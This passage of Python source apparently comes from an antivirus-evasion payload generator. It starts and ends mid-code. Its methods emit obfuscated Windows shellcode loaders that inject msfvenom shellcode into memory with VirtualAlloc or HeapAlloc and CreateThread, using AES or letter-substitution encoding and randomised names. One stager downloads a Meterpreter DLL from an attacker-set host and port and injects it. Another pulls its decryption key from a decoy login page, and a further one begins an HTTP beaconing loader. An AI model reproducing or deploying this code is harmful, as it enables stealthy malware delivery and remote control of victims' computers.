URLError, e:\n' PayloadCode += ' time.sleep(' + self.required_options[ "SLEEP_TIME"][0] + ')\n' PayloadCode += ' pass\n' # Execute Shellcode inject PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(' + RandHttpKey + ')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode elif self.required_options["INJECT_METHOD"][0].lower() == "heap": TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0]) target_html_file = str(TARGET_SERVER.split('/')[-1]) USER_AGENT = "User-Agent: " + self.required_options['USER_AGENT'][0] # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # Define Random Variable Names for HTTP functions RandResponse = helpers.randomString() RandHttpKey = helpers.randomString() RandMD5 = helpers.randomString() RandKeyServer = helpers.randomString() RandSleep = helpers.randomString() # Define Random Variable Names for HTML Functions RandHttpstring = helpers.randomString() # Genrate Random HTML code for webserver to host key file f = open( str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file, 'w') html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """ html_data += '<!--' + RandHttpstring + '-->' html_data = str(html_data) f.write(html_data) f.close() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES_http_request( Shellcode, html_data) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'import time\n' PayloadCode += 'import md5\n' PayloadCode += 'import urllib2\n' PayloadCode += 'opener = urllib2.build_opener()\n' PayloadCode += 'opener.addheaders' + ' = ' '"' + USER_AGENT + '"' '\n' # Define Target Server "Key hosting server" PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n' PayloadCode += 'while True:\n' PayloadCode += ' try:\n' # Open Target Server with HTTP GET request PayloadCode += ' ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n' # Check to see if server returns a 200 code or if not its most likely a 400 code PayloadCode += ' if ' + RandResponse + '.code == 200:\n' # Opening and requesting HTML from Target Server PayloadCode += ' ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n' PayloadCode += ' ' + RandMD5 + ' = md5.new()\n' PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n' # Genrate MD5 hash of HTML on page PayloadCode += ' ' + RandMD5 + '.update(' + RandHttpKey + ')\n' # Convert to 16 Byte Hex for AES functions PayloadCode += ' ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n' # Convert to String for functions PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n' # Break out to decryption PayloadCode += ' break\n' # At any point it fails you will be in sleep for supplied time PayloadCode += ' except URLError, e:\n' PayloadCode += ' time.sleep(' + self.required_options[ "SLEEP_TIME"][0] + ')\n' PayloadCode += ' pass\n' # Execute Shellcode inject PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0]) target_html_file = str(TARGET_SERVER.split('/')[-1]) USER_AGENT = "User-Agent: " + self.required_options[ 'USER_AGENT'][0] # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # Define Random Variable Names for HTTP functions RandResponse = helpers.randomString() RandHttpKey = helpers.randomString() RandMD5 = helpers.randomString() RandKeyServer = helpers.randomString() RandSleep = helpers.randomString() # Define Random Variable Names for HTML Functions RandHttpstring = helpers.randomString() # Genrate Random HTML code for webserver to host key file f = open( str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file, 'w') html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """ html_data += '<!--' + RandHttpstring + '-->' html_data = str(html_data) f.write(html_data) f.close() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES_http_request( Shellcode, html_data) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'import time\n' PayloadCode += 'import md5\n' PayloadCode += 'import urllib2\n' PayloadCode += 'opener = urllib2.build_opener()\n' PayloadCode += 'opener.addheaders' + ' = ' '"' + USER_AGENT + '"' '\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' # Define Target Server "Key hosting server" PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n' PayloadCode += 'while True:\n' PayloadCode += ' try:\n' # Open Target Server with HTTP GET request PayloadCode += ' ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n' # Check to see if server returns a 200 code or if not its most likely a 400 code PayloadCode += ' if ' + RandResponse + '.code == 200:\n' # Opening and requesting HTML from Target Server PayloadCode += ' ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n' PayloadCode += ' ' + RandMD5 + ' = md5.new()\n' PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n' # Genrate MD5 hash of HTML on page PayloadCode += ' ' + RandMD5 + '.update(' + RandHttpKey + ')\n' # Convert to 16 Byte Hex for AES functions PayloadCode += ' ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n' # Convert to String for functions PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n' # Break out to decryption PayloadCode += ' break\n' # At any point it fails you will be in sleep for supplied time PayloadCode += ' except URLError, e:\n' PayloadCode += ' time.sleep(' + self.required_options[ "SLEEP_TIME"][0] + ')\n' PayloadCode += ' pass\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n" # randomize everything, yo' sumMethodName = helpers.randomString() checkinMethodName = helpers.randomString() randLettersName = helpers.randomString() randLetterSubName = helpers.randomString() randBaseName = helpers.randomString() downloadMethodName = helpers.randomString() hostName = helpers.randomString() portName = helpers.randomString() requestName = helpers.randomString() tName = helpers.randomString() injectMethodName = helpers.randomString() dataName = helpers.randomString() byteArrayName = helpers.randomString() ptrName = helpers.randomString() bufName = helpers.randomString() handleName = helpers.randomString() data2Name = helpers.randomString() proxy_var = helpers.randomString() opener_var = helpers.randomString() # helper method that returns the sum of all ord values in a string % 0x100 payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName) # method that generates a new checksum value for checkin to the meterpreter handler payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName) payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName) payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName) payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName) payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName) # method that connects to a host/port over https and downloads the hosted data payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName) payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n" payloadCode += "\t" + opener_var + " = urllib2.build_opener(" + proxy_var + ")\n" payloadCode += "\turllib2.install_opener(" + opener_var + ")\n" payloadCode += "\t%s = urllib2.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" %(requestName, hostName, portName, checkinMethodName) payloadCode += "\ttry:\n" payloadCode += "\t\t%s = urllib2.urlopen(%s)\n" %(tName, requestName) payloadCode += "\t\ttry:\n" payloadCode += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" %(tName, tName) payloadCode += "\t\t\telse: return ''\n" payloadCode += "\t\texcept: return %s.read()\n" % (tName) payloadCode += "\texcept urllib2.URLError, e: return ''\n" # method to inject a reflective .dll into memory payloadCode += "def %s(%s):\n" %(injectMethodName, dataName) payloadCode += "\tif %s != \"\":\n" %(dataName) payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName) payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName) payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName) payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName) payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName) payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName) # download the metpreter .dll and inject it payloadCode += "%s = ''\n" %(data2Name) payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payloadCode += "%s(%s)\n" %(injectMethodName, data2Name) if self.required_options["USE_PYHERION"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): #Random letter substition variables hex_letters = "abcdef" non_hex_letters = "ghijklmnopqrstuvwxyz" encode_with_this = random.choice(hex_letters) decode_with_this = random.choice(non_hex_letters) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names subbed_shellcode_variable_name = helpers.randomString() shellcode_variable_name = helpers.randomString() rand_ptr = helpers.randomString() rand_buf = helpers.randomString() rand_ht = helpers.randomString() rand_decoded_letter = helpers.randomString() rand_correct_letter = helpers.randomString() rand_sub_scheme = helpers.randomString() # Create Letter Substitution Scheme sub_scheme = string.maketrans(encode_with_this, decode_with_this) # Escaping Shellcode Shellcode = Shellcode.encode("string_escape") if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Create Payload File payload_code = 'import ctypes\n' payload_code += 'from string import maketrans\n' payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n' payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate( sub_scheme) + '\"\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n' payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n' payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) return payload_code else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["expire_payload"][0]))) # Extra Variables RandToday = helpers.randomString() RandExpire = helpers.randomString() # Create Payload File payload_code = 'import ctypes\n' payload_code += 'from string import maketrans\n' payload_code += 'from datetime import datetime\n' payload_code += 'from datetime import date\n\n' payload_code += RandToday + ' = datetime.now()\n' payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n' payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate( sub_scheme) + '\"\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += '\t' + rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payload_code += '\t' + rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n' payload_code += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n' payload_code += '\t' + rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payload_code += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) return payload_code if self.required_options["inject_method"][0].lower() == "heap": if self.required_options["expire_payload"][0].lower() == "x": HeapVar = helpers.randomString() # Create Payload File payload_code = 'import ctypes\n' payload_code += 'from string import maketrans\n' payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n' payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate( sub_scheme) + '\"\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + shellcode_variable_name + ') * 2),ctypes.c_int(0))\n' payload_code += rand_ptr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + shellcode_variable_name + ')))\n' payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n' payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n' payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payload_code = crypters.pyherion(payload_code) return payload_code else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["expire_payload"][0]))) # Extra Variables RandToday = helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # Create Payload File payload_code = 'import ctypes\n' payload_code += 'from string import maketrans\n' payload_code += 'from datetime import datetime\n' payload_code += 'from datetime import date\n\n' payload_code += RandToday + ' = datetime.now()\n' payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n' payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate( sub_scheme) + '\"\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + shellcode_variable_name + ') * 2),ctypes.c_int(0))\n' payload_code += '\t' + rand_ptr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + shellcode_variable_name + ')))\n' payload_code += '\t' + rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n' payload_code += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n' payload_code += '\t' + rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payload_code += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payload_code = crypters.pyherion(payload_code) return payload_code else: if self.required_options["expire_payload"][0].lower() == "x": #Additional random variable names rand_reverse_shell = helpers.randomString() rand_memory_shell = helpers.randomString() rand_shellcode = helpers.randomString() # Create Payload File payload_code = 'from ctypes import *\n' payload_code += 'from string import maketrans\n' payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n' payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate( sub_scheme) + '\"\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n' payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n' payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n' payload_code += rand_shellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) return payload_code else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["expire_payload"][0]))) # Extra Variables RandToday = helpers.randomString() RandExpire = helpers.randomString() #Additional random variable names rand_reverse_shell = helpers.randomString() rand_memory_shell = helpers.randomString() rand_shellcode = helpers.randomString() # Create Payload File payload_code = 'from ctypes import *\n' payload_code += 'from string import maketrans\n' payload_code += 'from datetime import datetime\n' payload_code += 'from datetime import date\n\n' payload_code += RandToday + ' = datetime.now()\n' payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n' payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate( sub_scheme) + '\"\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n' payload_code += '\t' + rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n' payload_code += '\t' + rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n' payload_code += '\t' + rand_shellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) return payload_code
def generate(self): imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n" inject_func = helpers.randomString() getexec_func = helpers.randomString() main_func = helpers.randomString() beaconthr_func = helpers.randomString() retry_var = helpers.randomString() if self.required_options["BEACON"][0].lower() == 'n': global_vars = "%s = False" % retry_var elif self.required_options["BEACON"][0].lower() == 'y': global_vars = "%s = True" % retry_var interval_var = helpers.randomString() opener_var = helpers.randomString() global_vars += "\n%s = %s" % (interval_var, self.required_options["BEACON_SECONDS"][0]) global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var) shellcode_var = helpers.randomString() ptr_var = helpers.randomString() ht_var = helpers.randomString() buff_var = helpers.randomString() inject = "def %s(%s):" % (inject_func, shellcode_var) inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (ptr_var, shellcode_var) inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (ptr_var, shellcode_var) inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (buff_var, shellcode_var, shellcode_var) inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (ptr_var, buff_var, shellcode_var) inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (ht_var, ptr_var) inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var url_var = helpers.randomString() shellcode_var = helpers.randomString() info_var = helpers.randomString() thread_var = helpers.randomString() thread_name = helpers.randomString() thread_name2 = helpers.randomString() getexec = "def %s(%s):" % 